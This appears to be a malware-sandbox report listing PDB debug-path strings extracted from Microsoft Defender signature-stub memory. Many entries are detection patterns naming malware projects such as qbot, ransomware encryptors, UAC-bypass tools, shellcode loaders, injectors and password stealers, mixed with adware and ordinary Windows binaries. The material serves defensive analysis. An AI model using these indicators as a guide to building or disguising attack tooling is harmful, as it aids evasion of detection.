Source: Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: MpCopyAccelerator.pdb source: mpam-728dfe11.exe, 00000011.00000003.18594278193.0000027770036000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp
Source: Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp
Source: Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp
Source: Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: Release\ProduKey.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: winlogon.PDB source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-com-l1-1-0.pdb^ source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: 0.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp
Source: Binary string: \AppMaster.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbx source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp
Source: Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdba~ source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: wajam_goblin.pdb source: MpSigStub.exe, 0000000B.00000003.18313410353.0000021B5F14C000.00000004.00000001.sdmp
Source: Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp
Source: Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: joy.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp
Source: Binary string: mfcsubs.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp
Source: Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbj source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: mshta.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: BTR.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: PROZIPPER.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: ddraw.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: GPDFDocument.pdb source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp
Source: Binary string: wbadmin.pdb source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: Unite.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: \src\Release\wajam.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp
Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp
Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: MpDetours.pdb source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp
Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp
Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 0000000B.00000003.18261678877.0000021B5F587000.00000004.00000001.sdmp
Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 0000000B.00000003.18276905837.0000021B5FDE8000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: fc.pdb0 source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: SAVService.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: wscript.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: F:\downloader\download_mgr\Release\shell.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: acpi.pdbN source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 0000000B.00000003.18313524013.0000021B5F166000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: endpointdlp.pdb source: mpam-728dfe11.exe, 00000011.00000003.18587207189.0000027770034000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 0000000B.00000003.18278802492.0000021B5F3FA000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 0000000B.00000003.18302807114.0000021B5E60C000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: DefenderCSP.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18579337168.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18627348155.000002DF229BA000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp
Source: Binary string: ConfigSecurityPolicy.pdb source: mpam-728dfe11.exe, 00000011.00000003.18590234890.0000027770036000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
